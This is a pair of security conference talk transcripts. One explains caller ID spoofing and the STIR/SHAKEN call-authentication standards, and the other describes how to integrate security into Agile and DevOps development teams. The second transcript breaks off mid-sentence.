voiceover internet protocol. This is what a lot of mobile infrastructure and businesses are actually using now. And so this is what people are moving towards. This is kind of the standard technology that people have more access to now. But it can also interact with a PSTN. And then finally SIP is a way to initiate IP phone calls and other communications. You can kind of think of it like an HTTP request for phone calls. It contains metadata and instructions about where a call is both coming from, who it's going to, and some other data about what the call should be. And the important thing to note here is that shaken and stern will only apply to SIP initiated phone calls. And so let's kind of talk about what the problem is here. And I specifically frame this as unwanted robo calls because not all robo calls are bad. So you can think of things like prescription pickup notifications, food delivery services, you know, things like the school has a snow delay type thing. There's reasons to automatically dial. But we do know that most of the robo calls that we get aren't that they're spam and that's bad. And so we wanted to focus on like the greater problem of the unwanted robo calls here. And the reason this is a problem, it's gotten super common in the last five to 10 years for a few main reasons. First, there's a lot of cheap dialers now. It's really easy to do this automated dialing in an efficient way that actually makes spam and fraud more both efficient, but also profitable. And second, there's over 4,000 service providers in the US alone, and that makes it easier to access and also gives you more access options to access the PSTN. And third, there's no validation or authentication on who is placing a call. So you can basically set the from number to whatever you want. And so there's an app that I downloaded at iOS that just lets you spoof phone numbers. And you don't really even have to know how SIP works. Like there's a way that you can do this with some SIP knowledge that's even more cheap. But there's like these consumer applications that you can download if you're at iOS or Android user that you don't have to have any technical know how. And you can just have to believe me that this is a call I placed to myself from 8675309. So you might be asking like, why isn't this just illegal, right? And the main reason is that because there are some legitimate use cases for spoofing phone numbers. So nowadays, the practice for companies like Uber or DoorDash or something like that, they'll proxy phone calls through a third number that connects individuals. So like when you call your Uber driver, when your DoorDash delivery person calls you, you're not getting a phone call from their number. You're getting a phone call from a third party, a number that's being proxied in between you. And that has privacy use cases and also some cost saving measures. But it wasn't always like that, right? And so you also had enterprise systems or private branch exchanges that might be placing a call to a customer from an individual agent's line, but they want to display something like the toll free callback number. And historically, those were just spoofed. You would say, hey, this isn't coming from me, Kelly. This is coming from my organization. And I want to make sure that you see this friend number in case you need to call that back. And these systems still exist. So we can't just outlaw this completely. In fact, the New York Times actually spoofed their from number until 2011. And it was one of those things to help protect their sources. If journalists were calling from their desk phones, they didn't want to necessarily be calling from an individual journalist's phone. But then I actually will use a 212 number that you can call back. We did introduce some legislation to address this. The 2009 Truth and Caller ID Act was what did that. So again, this is only about 10 years old that we started to really think about this as a problem. But we can't completely ban call spoofing because of the legitimate ways that businesses are still using it. So legislation specifies that it is illegal to spoof numbers if there's that intent to defraud. But there's also this enforcement struggle with this because the network comps, it might take five or 10 service providers before you know who actually initiated the call. And they might or might not be able to tell you about the caller because they're placing calls on behalf of many, many customers. And so tracking down a spammer takes a lot of time and effort and therefore money. And that makes enforcement of this really hard. So that brings us to the solution. That brings us to shaken and stir and what we're here to do. Shaken and stir are the most egregious of background imprims. So shaken is the signature based handling of asserted information using tokens. Stir again is secured telephony identity revisited. It does get worse. There's a proposal out there for lemon twist, but we're not even going to look at that because I think people are just getting a little too creative. But basically as the FCC describe it, what shaken and stir does, calls would have their caller ID signed as legitimate by the originating carriers and then validated by the terminating carriers before reaching consumers. And so this is where it comes into that TLS like authentication. You are signing calls as legitimate and then the terminating service provider would then display some information to the end user signifying that calls can be trusted and they were not spoofed. We're not reinventing a wheel here. We're borrowing from other web authentication, things like public key infrastructure, certificates, JSON web tokens are all being used for this. And it's very similar to emails, DKM and DMARC, which basically authenticates the from sender in an email. And so a lot of the work that was done on shaken and stir was done in conjunction with some of the authors from DKM and DMARC as a way to kind of set best practices for this type of communication. And this is a simplified view of the end to end system, what happened with the shaken and stir sign calls. So the signing service includes some public key infrastructure, key management, and it will be up to the originating service provider to do the key management there. And so calls are routed in a few ways. So basically between the originating service provider and the terminating service provider, you might remember from that early side that there's like all these kind of routes that a call can take. And the way that that happens is there's something called the LNP or local number portability. And this is what people are using to both track whether numbers have been ported between carriers, but it also works as kind of a DNS like lookup to look up phone numbers so that you can then route calls to the right service provider. And usually the originating service provider, it's up to them to basically do this routing. The onus is on them to decide on the route that a call is going to take. They're usually using something called lease cost routing. Twilio uses like an inter exchange carrier. There's vendors that allow you to do this to route calls. I don't want to get into that too much, but basically when it is being passed through the other service providers in the middle there, it is just being passed through. There's not additional validation in the middle there. They're just passing the call through. And then on the other side of things, the terminating service providers then has their own verification service. And the verification service is what contacts the certificate authority and uses the certificate authorities authority there to then verify whether or not the call that came into them is a valid sign call. And so certificate authorities are being chose by ADIS. That's the Alliance for Telecommunications Industry Solutions. And so this is the standards body that authored shaken. So some of the certificate authorities that have been chosen are people like Newstar and Transnexus. I think there's a few others that haven't been publicly announced yet. And these are similar to the certificate authorities that administer TLS certificates like Let's Encrypt. And so then when a call reaches the terminating service provider, it's up to the client. So this would be somebody like Apple or Google to decide how to display that the calls are trusted. And so this could be something like, hey, I've got a check mark next to this call. We display something like you saw in an early slide that says the verified, there's a verified caller here. You could do something like a lock that we have like in browsers with the TLS, HTTPS sites. So there's different options here and that has not been standardized in terms of how to signify this to consumers that these calls are not spoofed. And so I think that's going to be one of the interesting challenges that we see as it's just gets rolled out more is how do we build this trust on the consumer end of things and display this to them in a consistent way so that they know what to expect. So let's get into a little bit of the weeds of how this actually works from the technical perspective. So this is what a SIP header looks like currently. You can see the metadata included there. Just a reminder, SIP is the way to initiate voice calls or a way to initiate voice calls. But note the from here. So the problem here is that the from number can be spoofed and that happens if either the originating service provider allows it, isn't doing any validation on that. There might be those legitimate reasons for that, but they basically want to make sure that and a lot of legitimate service providers are already doing this validation. They're not letting you place calls from numbers that you don't have access to. But there's like, you know, like I mentioned, there's over 4,000 service providers in the US alone. Like a lot of the long-tail service providers might not be doing this validation. So what it's shaking does is it introduces a new identity header. And this is in the form of a base 64 encoded JSON web token. And I'm going to focus on just some of the information that's encoded in the middle section here. And so the information that's encoded there includes things like the attestation level. And so this is in the header. And we'll talk more about what the attestation level is on the next slide. But this is basically the crux of like whether or not we trust this call. But it also includes some additional metadata like who the call is going to, who placed the call, and then importantly, the origin ID, the origination ID. This is for the originating service providers underlying customer. And so this is set by the originating service provider. And so the originating service provider, the OSP there, is really putting their reputation on the line saying, hey, this is my customer that is placing this call. And I'm giving them this level of attestation. And this is important because this ID makes it near instant to identify bad actors because you can trace back the call to the underlying customer. And this is what's going to allow us to enforce the truth and caller ID act. And so not only does shaken allow you to build trust in calls that aren't spoof, but it also allows a lot of the enforcement side of things to make sure that we can track down bad actors more quickly and more efficiently. So back to the attestation levels, there are three levels that can be attributed to a caller. And so the originating service provider is going to decide what the attestation level is here. So A is the highest level of attestation, of course. And so this is saying, I know who this customer is, and I know they can use this number that they are calling from. And so that is what you would assume most of the legitimate business calls being placed are attestation levels B and C have some less level of trust in the call. But this is still likely to be a less fraudulent call if it's signed with any of these attestation levels than if it wasn't signed at all. And so generally, I think what, and this is where we don't have a lot of standardization around this yet, but the clients, so the Googles, the apples, are going to have to decide in conjunction with the carriers, the Verizon's, the T-Mobile's, these types of people how to display trust. And likely what's going to happen is that they're only going to display a check mark or a verified caller if there is that attestation level A. So new technology is really great, but we need to make sure that people are actually implementing this. And so one of the things that is good about this is it puts the onus on businesses to do the implementation and not as much on the consumers to increase consumer protections. But the main way that we're going to ensure that businesses implement this is with the Traced Act. And so this is the Telephone Robocall Abuse Criminal Enforcement Deterrence Act. It was passed by the Senate last May, passed by the House and signed into law in December of 2019. So I think it was like December 30th of 2019. It was signed into law. And what it did is gave a timeline that started at that point. So basically you can think of the beginning of this year, it gives telecom companies 18 months to implement shaken and stir. And so you can think mid-2021 is kind of when the deadline for this is. A lot of bigger companies have been working on this for a while, but it's still going to start to enforce the deadline in mid-2021, assuming that everything goes as planned. So it also allows for a $10,000 fine for offenders. And so this does also add an additional fine on top of the existing Truth and Caller ID Act. So the authentication requirements for the Traced Act depend on the type of call. So if it's VoIP, the requirements there is that you have to implement shaken and stir. But they do acknowledge that there isn't really good solution for non-voIP calls yet. And there are a lot of non-voIP calls that are on the PSTN. And so Newstar has a solution called Stir Out of Ban for non-voIP authentication. If you are a company that's placing non-voIP calls, there's things that you can look into here for you or your customers. But definitely I think that's one of the challenges to getting this implemented is not everything is just going to be able to implement shaken and stir. And that's kind of what I wanted to get into now is just what are the limitations of this technology, first being, according to my curmudgeonly co-worker Randy, who's been working in telecom for many, many years, the phone network is kind of an ungodly beast. And so it's a collection of wires that has been rapidly expanding for over 100 years. So there is this kind of situation that we've run into where there isn't a standard technology that's being used for all the calls. And so we can't just flip a switch and change everything over to be suddenly authenticated. And part of that ungodly beast is this thing called Time Division Multiplexing or TDM. This is essentially the opposite of VoIP. It's old school hardware that's been around for 50 years. It's baked into a lot of enterprise private networks. And the Trace Act explicitly acknowledges TDM as a potential burden to implementing shaken and stir. So they said that the burdens are barriers to the implementation, including for providers of voice service to the extent the networks of such providers use Time Division Multiplexing. Fancy language in the bill that basically says we get it. This might be hard for people that aren't using VoIP. And then another challenge that we have is that there just is this long tail service providers. Like this is something that companies like Twillio and Verizon, Comcast, other large companies have been working on for months. What happens when you're a smaller scale service provider that's running limited infrastructure, you might have different access points to the PSTM that aren't going to be VoIP, like I said. So, you know, of the 4,000 service providers in the U.S. alone, I don't know what percentage of those is going to be compliant by mid-2021. So the requirements to comply with this law does require significant investment. I don't know if we can reasonably expect that everybody will be able to make that investment in time. And then there's all these other problems. You know, the biggest problem like is in the U.S. right now, but this is also a problem in places like U.K. and Norway. And I haven't really heard of any initiatives outside of North America to address this. There are starting to be, you know, some initiatives to implement this in Canada. But, you know, maybe this is something that if your country has a solution for this, definitely reach out. I'd love to hear about what you're doing for enforcement there. But you know, there's other things that we have to think about. Like what about ported numbers, you know, the international side, like I mentioned, and also like text messages. There's other communication channels that don't have the same type of authentication. So the FCC's number one complaint right now is robo calls, but the government is obviously a little distracted with other global pandemics right now. But you know, I think in terms of that department, this is something that they have a priority and a motivation to fix. And so like I said, the timeline for enforcement here is that towards the end of 2020 or into 2021, we'll start to see more people start to implement this. And you might start to see calls coming through already on your phone that might have a check mark or might have an indication that they're being signed. So what can you do in terms of implementing shake and stir for your business? Talk to your service provider, whoever is doing your telephony. Most businesses probably won't have to do much in terms of implementation. A lot of the onus is going to be on the service providers themselves. You might have to go through some additional verification, some like KYC know your customer type stuff with your service provider. So at Twilio, we'll need you to create a business profile that has some additional details about your account before we would give you and start signing your calls with the highest attestation. And then there's some precautions that you can take as just application security professionals. So you can protect your numbers from web scraping bots. Assign sequential numbers to your employees. That's a way that people can kind of guess which employees might have lines at your company. And then you can use actual authentication in your call centers. This is another way that you can protect your business from vishing. This is something that I could talk about for many, many hours that a lot of companies basically will only ask for a consumer date of birth and email in order to verify the customer. So there's a lot of other things you can do to actually authenticate people on either end of the call. And then if you know what a PBX is and you have one, you might look into installing the FCC blacklist database on that. Some controversy around whether or not you want to do that. It's hard to get off the blacklist database if you're on there. But this is something that you may or may not have to worry about. And then there is some ongoing legislation. But things have been pretty quiet from the FCC this year. They did recently, somewhat recently, like in the last year, give telecosy authority to block unwanted calls without explicit subscriber permission. And so AT&T, Verizon, T-Mobile in the US, they can now decide, hey, we're going to send this to basically like a spam folder without ever notifying you that the call came in. And I don't need you, Kelly, to tell me that that's okay. And then like I mentioned, in terms of timeline for the Trace Stack, the enforcement will start to begin at the end of 2020. This update from the FCC on this was March 31. And this reaffirmed their call to implement Strykin and Sturr. But it did already grant an exception for an extension for small voice service providers. And I don't know what that means. I don't know exactly how they're going to decide who is a small voice service provider. But they are already thinking about, you know, this was three months after the bill was signed into law. They're already saying, hey, maybe this timeline isn't reasonable. So while I do think that a lot of larger telecom providers will start to sign calls within the end of this year, I do think that there is going to be an exception for that long tail of service providers. And not everything is going to be a sign call before, you know, the end of 2021. There are a couple of things you can do as a consumer to protect yourself today. You can install one of these apps depending on how much you trust them. A lot of times you have to give them basically complete control over your phone. So your mileage may vary there. But things like no one will robo robo killer call app, you know, companies like AT&T have a partnership with a company called Haya that does, you know, some protection against spam calls. Of course, a lot of consumer telecoms are starting to upsell spam detection services. So Verizon offers their call filter plus for the low, low price of $3 a month. But you know, these are things that you can look into installing on your phone if this is something that is a huge noise to you right now. So like I said, unfortunately, I don't think this is going to solve all problems right away. But I think people are really optimistic that shaken instead will help restore trust and telephony because not only is it going to help, you know, mitigate spam calls that are coming into your phone, but for those wanted calls for, you know, the calls that you want to see that might be from unknown numbers, there's going to be a renewed trust in some of those phone calls. And so there is that motivation from businesses to restore that type of trust so that people will answer the calls. Hopefully this is a good overview in terms of what you can expect from shaken and stir. If you have any questions, you can find me on Twitter. I'm also on Discord. Once again, my name is Kelly Robinson, and thank you for listening.
|
If you've noticed a surge in unwanted robocalls from your own area code in the last few years, you're not alone. The way telephony systems are set up today, anyone can spoof a call or a text from any number. With an estimated 85 billion spam calls globally, it's time to address the problem. This talk will discuss the latest advancements with STIR (Secure Telephone Identity Revisited) and SHAKEN (Signature-based Handling of Asserted information using toKENs), new tech standards that use well accepted public key cryptography methods to validate caller identification. We'll discuss the path and challenges to getting this implemented industry wide, where this tech will fall short, and what we can do to limit exposure to call spam and fraud in the meantime.
|
10.5446/51609 (DOI)
|
Hello and welcome back. Hope you're looking forward to another fantastic talk here at the Apssac Village for DEFCON 29 in safe mode. It's important to remember your 3-2-1, even though we are separate from each other and socially distanced, your cohabitants will really appreciate that one in there. Just take care of yourselves, get some good sleep, get some good food, make sure you take a shower. For our next talk, we've got David Waldrop talking about the DevOps and Agile Security Toolkit. After 25 years in the application development, David moved to Information Security just over 7 years ago. His passion is helping developers write secure code. He's currently an Information Security Advisor supporting the application development community at his employer. Let's put our hands together and welcome David Waldrop. Hi and welcome to the Apssac Village. I hope you're having a great DEFCON 2020, albeit in safe mode. My name is Dave and for the next 30-45 minutes, we're going to talk about the DevOps and Agile Security Toolkit. Now before I get started, I have to make the standard disclaimers. First, this presentation and any comments that I make are my own and do not necessarily represent those of my employer. Secondly, I will mention a few example products, some are commercial, some are open source. These are not necessarily meant as recommendations. They are mentioned to serve as a starting point for your own investigation and review. These are things that I've run across in my journey, so take that as it is. Let's start with the two terms that are on everybody's buzzword bingo sheet these days. DevOps and Agile. We need to get definitions in place for the duration of this talk, so we have an idea that we're all dealing with the same playing field. Agile. Agile focuses on continuous iterative development and testing. Software is developed in smaller increments and then is integrated for final testing and delivery. Scrum, Kanban, and XP Extreme programming are examples of Agile approaches. On the other hand, DevOps focuses on the collaboration between AppDev and Operations. The focus is on deploying code to production in a fast manner, usually automated. So you can see from the definitions that these are two separate concepts. However, many organizations tend to combine them into one initiative. Very, very rarely do you find a shop doing DevOps and not doing Agile or vice versa. So no matter whether they start with DevOps or they start with Agile, the one piece that's usually late to the party is security. But no matter how late security is invited to the party or whether we have to crash the party ourselves, we usually can still bring valuable resources without slowing things down or at least without slowing them down a lot. And that's what we're going to talk about through the rest of this discussion. So for the past few years, I've worked with several different Agile and DevOps teams. My integration with this started as a pilot program where I was the information security representative that was assigned to help introduce Agile to our organization. More recently, I've implemented the information security integration with the Agile and DevOps teams across our organization. During this session, I'm going to share with you some things that really worked well and some things that just didn't seem to work at all. So hopefully you can take something away from this and apply it to your own organization. This particular slide will give you the map of what we're going to talk about for the rest of this discussion. We're going to talk about Agile staffing. We're going to talk about the eight simple questions. We're going to talk about the security champions program and then go into developer training, which is my favorite part of my job. Security in the software development lifecycle. And then we're going to hit the hat trick of securing your code, static code analysis, dynamic code analysis and open source analysis. And then finally, we're going to wrap things up by automating the heck out of it. So let's start with Agile staffing. Sherman set the way back machine for one when I started with Agile. One information security person was assigned to one Agile team. That security person would be integrated into that team and attend every ceremony, every meeting, everything, every day. That didn't work. There are a couple of reasons I think that that didn't work. First of all, agile teams tend to multiply. You can go from a proof of concept with one team to having close to 30 teams in less than two years. Most organizations do not have the information security bandwidth to support that type of staffing model. In addition, the scrum masters tend to treat every member on the team as though they can perform all tasks. And when you're dealing with a team of all developers, that makes perfect sense. This model tends to fall apart though when you put information security, QA, middleware, any other infrastructure or shared services team as a part of the agile team. What happens is in the agile process, their hours count against your available development hours. But the infrastructure people, the information security people do not have the skills or the capabilities to do some of the development. You see that there's a mismatch. You're given hours, but you're not allowed to use them. It caused a lot of problems for some of our scrum masters early on. Again, we realized this was not the way to do it. I ended up coming up with a two tiered approach for trying to integrate information security into the agile team. First, at a high level, at the enterprise level, we will have an architect, an information security architect, and they will inject into those high level projects and basically set up guardrails and guidelines. So as projects are being devised at the visionary level, they can jump in and try to help guide them into making more secure decisions at that high level. Now, when you get down into the weeds though, each agile team does need to have somebody they can rely upon for information security. And so what we ended up doing is we created named resources within the information security team that are assigned to agile teams. Now it's not like the previous model. You're not assigned, you're not sitting with them, you're not assigned to go to every meeting. We're going to talk about how we scaled that back, but we ended up finding a way where based on where information security can add the most value, we attend those ceremonies and only those ceremonies. So at the end of the day, each information security representative can support between six and eight different agile teams. That is a model that is certainly sustainable. So what is a little different? Well, first of all, we make sure that every agile team has a named resource that is responsible for information security for them. So this gives them a named contact if they ever need something they know exactly who to call and where to start that quest. Secondly, we attend or the agile reps attend the backlog refinement sessions. These are meetings that happen once every two weeks before the next sprint and it defines what they're going to work on in that next sprint. It's a perfect opportunity to jump in and say, hey, you're planning this work. We need to think about blah, blah, blah from an information security standpoint. We can get in just ahead of when development starts. It's a perfect time to bring up security issues, make recommendations and answer questions. And then finally, we attend the quarterly planning agreement meetings where the vision is cast for the next quarter and we can make sure that we're on their radar for things that we think we need to be a part of. So this is kind of a high level diagram. The purple arrow at the top is the information security architect. That particular person, as you can see from the diagram, sets guardrails for enterprise planning projects. All of the red arrows are the different places where our individual security representatives can or may inject into the agile teams. We don't inject in all those places, but there are places where we can and we give them that option to call us if they're needed. So let's move on to what I like to call the eight simple questions. This particular concept came up as a result of assigning our agile reps to their teams. We found that the leadership within the agile teams really wasn't sure when to call us. And since we weren't sitting there in every meeting, there was a possibility that something could come up that might fall off the radar that we might not get contacted for that they may not even think is important. So we decided that we need to give clear guidelines to the scrum masters and product owners as to when they should include information security. That's how I created the eight simple questions. So basically these eight questions are a guideline for that leadership team. And if they answer yes to any of them, they need to make sure to include their information security representative in those discussions. These are the questions as I currently have them. We're going to talk about that in just a bit because they change over time. These are not one and done kind of things. Am I dealing with any sensitive information? Now information that is sensitive, it's going to mean something different for each one of our organizations. If you're working in healthcare, if you're working with banking information, if you're working with retail with PCI information, you will be able to find what sensitive information means for your organization. Am I sending or receiving data outside of the company? Is there a new vendor involved? Am I going to introduce new software systems or libraries, even open source and remember open source because we're going to talk about that? It's a unique challenge. Do I need access to secrets such as passwords, keys or certificates? Will I need the ability to use single sign on? Am I going to leverage the cloud? Will I need updated access roles? So these eight questions are what we are currently using as a guideline for the interaction between the agile team and their information security representative. As I mentioned, the exact questions are going to differ on your organization. The questions themselves will actually change over time. I started, I think, with seven questions and then we had several issues come up with access roles and who to ask and blah, blah, blah. So we added a question for that too. So don't be afraid to take a stab at it and massage it and change it. That's the thing about agile and DevOps. It's changing all the time and we as information security people need to be able to change our stuff as well. So the basic idea is this. Create a list of questions usually 10 or less, something that's going to fit easily on a PowerPoint slide or a single piece of paper so they can take it to meetings with them. Give that to the agile team leadership and they have a guideline. They now have a concrete way of knowing when they need to work with information security. So we found another advantage to this approach as we onboarded additional information security people to become representatives for the agile teams. A lot of these folks were pretty new to the organization and they didn't really know when they needed to inject themselves into their teams. They didn't know what they needed to listen for in the backlog refinement sessions. So we use these simple questions on our own people. It gave them guidelines and hints of what to listen for when they're working with their agile teams. So this kind of became a win-win on both side of the coin. So I think this was a great tool that we've been able to use. Another tool that I honestly have to thank Jim Manneko for. Jim if you're out there thank you for this. This was a recommendation he made to me after one of our training sessions and that is the security champions program. A security champions program is a team of application developers. We get one from each agile team and these developers have expressed an interest in information security or secure coding or just security in general. This is a voluntary program. The members of the team volunteer to come to the security champions program. And we typically meet quarterly. I provide them lunch when we're in the office thanks 2020. I look forward to getting back to the office and having lunch with these guys and gals. They're a great team. So the team has this following charter. We assist the agile teams in terms of application security. We serve as a communication conduit between the agile teams and information security. And then we meet quarterly to share experiences. We ask questions. We share knowledge. It has had some incredible benefits. First of all security has a relationship with at least one person on every agile team. I'm not saying we have a mole. What I am saying is sometimes we hear about things long before it percolates through the management chain. I might get a phone call about hey we're thinking about using this open source library. Is that cool. We take a quick look at it. We approve it. By the time the formal approver gets into my hands we've already done it in their coding. So it gives us a great communication conduit and that helps me make things faster. I may have not mentioned this before. I hopefully I have relationship is key. You're going to hear about relationship throughout this entire discussion. We build relationships with those agile teams. It starts with having an assigned rep. It moves into a different relationship level when we have a security develop security champions team. Secure coding training takes it to yet another level. And you'll see why in just a few minutes as we talk about the developer training. But it's about building relationships. It's about having fun while we're doing the right thing for our organizations. So so far the team has done a lot of really cool things. We've reviewed vendors and products both on the development side and on the information security side. We've selected our developer training programs for the last two years based on the input from the security champions team members. We've done a bunch of PSEs together. We've cross consulted. Now this was kind of an unexpected benefit is where if I had a team that was very well versed in one technology and they mentioned that in a security champions lunch, another team might reach out going, hey, we're about to do that. Can we stand and talk? So it actually starts to cross pollinate some security knowledge and some technical knowledge between different application teams. And then finally, it's served as a candidate group for application security openings within the infosec team. The software development life cycle. So as we started to roll out security, a lot of people have asked us, how does this fit into our SDLC? So I ended up creating a plan that maps information security phases to the software development life cycle as it currently exists. It is not a perfect fit, but I think it is a good representation of how information security can bring value to each step of the SDLC. So this is what I like to call my dark side of the moon diagram. Those of you old enough to remember probably recognize the album cover. So if you take a look on the right, we have the software development life cycle from concept into design up into coding testing a QA, QA and deployment and then post deployment at the very top. Now, if you look on the left side, you'll see that it matches up pretty closely with security knowledge, security design, secure coding techniques, security testing and then security response. The each individual layer of the pyramid, I think are deliverables that security can bring that help take that concept on the left and apply it to the SDLC phase on the right. And we're going to walk through those real quick. Training is the base of the pyramid. I think training is foundational to everything above it. If you don't have a solid foundation of training for your application developers, everything else is at risk. So this particular approach, we're going to talk about in depth again, because it's my favorite part of what I do. It includes things like lunch and learns, outside speakers, conferences like you're attending right now, video training and things like that. The next level up is threat modeling threat modeling, the application team and InfoSec. We sit together, we work together to examine the application design, the system flows, whatever they can bring to us that they have available in that design phase. We look, we try to work together and identify potential vulnerable vectors and try to figure out a way that we can mitigate them. Now threat modeling, there are books upon books written about threat modeling. And there are people in my organization on my InfoSec team that are much better at it than I am. And they can actually create incredible documents and spend hours and days and days and days doing this. I think you need to start out small. I think it's about baby steps at first. Start with a discussion. This can be a one or two hour discussion where you have those deliverables from the design phase and you whiteboard them. And you come out of there with to dos or questions or things to research. It doesn't have to be this big, heavy weight overbearing approach to threat modeling at first. It needs to be a conversation that gets back to relationships. You need to have those relationships in place so you can have those conversations. The third level up is static code analysis. We're going to talk about this in much more detail later. But most tools are designed to identify potential vulnerabilities within the code. Now static code analysis actually looks at the code and looks for patterns within the code without running it. Now we're going to see a little bit later why that's important. I think I went the wrong way. There we go. Dynamic code analysis is the next layer up. And that is very similar to the previous layer which was static code analysis. But instead of just looking at the code, the code is actually executed and tested for vulnerabilities. So like I said, these two pieces are very, very similar. One is looking at patterns with the code. The other is actually exercising the code and looking for issues. The next is pin testing. Pin testing can be performed by your internal team if you have the skills or resources or you can use an external firm. This is usually a greater scope than dynamic testing. It will actually look at things not just in your application but system wide for vulnerabilities and attack vectors. And usually there's a person involved. It's not just an automated exercise. We're going to see a little bit more when we talk about dynamic testing, the difference between that and pin testing. And then finally, when the code is in deployment, you need to have a vulnerability management process that you can classify, assign, and track identified issues. Right now, InfoSec meets regularly with a representative from each application team to review these and to make sure that they're working and they're on track. Again, those relationships are absolutely key to making this work. So now we are getting to what I consider my absolute favorite part of my job. And that is developer training. If you remember back to that pyramid we just looked at, this is the foundation for everything that information security does with app dev. When I came in to information security about seven years ago, I started a developer training program because I realized that the developers really are your last best hope for defense when it comes to application security. If your application is written correctly, then everything you throw in front of it, application firewalls, everything like that, that's gravy. That's nice, but you've got a really tight application and that's where real security takes place. The problem is, I was a developer for roughly 25 years before coming to information security and nobody taught this stuff. This is stuff you learned on your own. If you had an interest in it, and it wasn't universally available to all developers. So I started small. I started with Lunch and Learns. It was really something that, hey, I think this is important. Let's try it. Let's see if it works. And it really did. We would end up having Lunch and Learns about every other month. I would create a class on a specific topic. My first one was cross-site scripting, a lot of fun. It's neat when you can show people cross-site scripting examples, even if you just run Webgoat or something like that. They get excited. They kind of dig it and they start trying it on their own stuff. The content usually lasts about 40 or 45 minutes, a lot like this session. And then we leave 10 to 15 minutes for open discussion and questions. Now the key here is make it fun. It has to be fun. I do things like I'll go out and I'll buy cookies or some kind of treat. So we can all sit around, eat something together. There's usually some kind of door prize or door prizes. And they don't have to be expensive. You can just go down to like five below and get a couple of wireless Bluetooth speakers. And people dig it. It's a lot of fun. Again, making it fun is absolutely key to a successful Lunch and Learn program. So once we got that up and running, I decided we needed to take this up a notch. There is a level of training that I couldn't provide that I think our developers really, really would benefit from. And in order to do that, I knew that I had to reach out to industry experts. And what we ended up doing is we were able to get commitment from management both on the IT development side and on InfoSex side that we could do one or two days where most, if not all the developers will attend a training event. Now here's a hint. If you are going to try this and you're doing Agile, put it in your innovation sprint. If you put it in the innovation sprint, which is usually the last sprint of the quarter and the developers have a little more leeway of what they work on during the innovation sprint, you'll very likely get more participation than if you step on a middle of a sprint where there's actual deliverables do. So keep that in mind. I was really, really lucky. My very first interaction with this program, I was able to secure Jim Manneco and he came in and made an incredible impression on our development teams. Jim's been back, I think three times now. Always a pleasure. Rich Mogel's been by twice. We've had a recent one with Ron Parris. Dr. Phillip DeRique, phenomenal instructor. I just took his OAuth class. So if you're looking for OAuth, wonderful class. But we've got him coming in this fall and I'm looking forward to that. The reason I actually want to call these gentlemen out by name is I think it's important to be grateful. I am very grateful for everything they've done for me and my development teams. And it's important to be grateful to those who help you along the way on this journey because none of us make it alone. So gentlemen, thank you very much. If you see this or hear it later, your training, your mentorship has meant a lot to me and my development teams. So one cool aside is I mentioned this earlier. The security champions team has been involved in the selection of the instructor for the last two years. This gives your application development teams a voice in the training. And we've seen that participation has actually increased. We had great participation before then. But when the developers actually had a voice in picking, who's coming in and what they're going to talk about, we're finding that it's much more applicable to what's on their roadmap. It's much more applicable to the skills they're hoping to get. And participation goes beyond what I could have ever hoped for. So again, we're starting to see some of these initiatives are starting to weave together and starting to build kind of a program. It's kind of cool. So this next one, I really wish I was doing this right now. Take a developer to DEF CON. We had management agree to provide scholarships to developers that were selected by the information security team. So we would give them the money to buy their badges. So they wouldn't have to go and get money out of their own bank account. So each year, I've been able to bring up to three developers to DEF CON. That's been awesome. It has been just a phenomenal experience. They've gained a ton of knowledge and a ton of awareness by DEF CON. One of the things that I found really interesting was I really advise them not to restrict their sessions to things that they think will apply to their job. I did that my very first DEF CON and I wasn't really sure I was going to come back to be honest with you. The next year, one of my coworkers strongly encouraged me to go. Thank you, Barry. And encouraged me to go and find a few fun things that just had nothing to do with my immediate job. The interesting thing is they ended up having more to do with the things that were coming down the road in my job than I ever could have imagined. So I fully encourage each one of these developers that I bring to DEF CON to experience the full DEF CON experience. Go to all the sessions. Try some of the capture the flags. Try whatever you want. Have a good time because it's really important for them to be immersed in the DEF CON experience. So like I said before, they come back with a changed perspective. It's a lot like that scene in The Matrix where that thing crawls out of Neo and he goes, my God, that thing is real? They understand now that the security is not just something that we're teaching and preaching about within InfoSec. That this stuff has real world application. And it's that realization that makes them a better developer, a more secure developer going forward. We've seen a trend where a lot of the folks that we've taken actually, I think all but one of the developers that we've taken to DEF CON have eventually become security champions members. And then more recently, just in the last couple of months, one of those developers, I think he was the first one I took to DEF CON with us, ended up joining the information security team on a full time manner. And Shane, if you're listening, welcome. I'm really glad that you're part of the team. So there's a couple of other fun activities that we do in developer training. Again, got to keep it fun. Everything has to be fun. You learn better when you're having a good time. I mean, look at DEF CON, we're all having a great time. And we're learning stuff. So a couple of DEF CONs ago for reasons of work, I couldn't make it. It was the only DEF CON since coming over to information security that I was not able to go to. And I must admit, I was bummed. So what I decided to do was I was going to have my own little DEF CON. And we decided that, okay, let's just take people along for the ride. So we identified five videos from previous DEF CONs and we had a lunch and learn for five days that week where we watched it and we talked about it. We had drawings for DEF CON related swag or items or giveaways. We just kind of had a good time. It was kind of built up as, hey, take a break, come bring your lunch, let's hang out, watch something from DEF CON, talk about it. You might win a t-shirt, you might win some stickers, whatever. And people really enjoyed it. It was a lot of fun. As a matter of fact, I'm probably going to do one this fall for the folks that didn't get to enjoy what you're doing right now, what you're enjoying right now. And then finally, I have an annual thank you lunch and learn. This was a tradition I started the first year we did lunch and learns. It's always the last lunch and learn of the year. And I typically will go out and I'll purchase quite a few giveaways. They don't have to be expensive. We do things like, say, the Bluetooth speakers, boxes of candy. We've done some Christmas mug sets, you know, just weird things, but things that are kind of fun. And we do a shorter lunch and learn followed by a session where we just eat some good food and we have some drawings. And I have an opportunity to thank my development community for the support of the lunch and learn program and for the support they've given to information security. I think it's important to say thank you. And this has been just an incredibly popular lunch and learn every year. It's a lot of fun and I highly recommend it. So here are the keys to a successful lunch and are successful training program. Make it applicable and give the developers a voice in the training. And usually if you give them a voice in the training, it will be applicable just because they're going to tell you what they need. I think I've mentioned this 1427 times, but make it fun. It's got to be fun. Share how much you care about this stuff. If you're engaged, if you're passionate about it, people are going to feel that and they're going to gravitate to you and gravitate to that topic. And then finally build relationships. Listen, reward and always express gratitude along the way in this journey. So we're getting into the next phase of the toolkit. And this is what I like to call the analysis hat trick. Three types of analysis that if we implement all three, we're going to have a much more secure code base in production. And the first is static code analysis. You might remember that from our SDLC pyramid. So static code analysis scans the code without running it. It looks for known patterns of vulnerabilities. You can usually select what you scan for. Some will allow you to scan for PCI, blah, blah, blah. I almost always scan for OWASP top 10. If you're not familiar with OWASP or OWASP top 10, I strongly recommend that you check it out. Some of the deliverables from that organization are absolutely stellar. I've been a member for I think seven years now just after joining the InfoSec team. And I've leveraged a ton of their stuff. So great organization hats off to you if you're out there. In an ideal 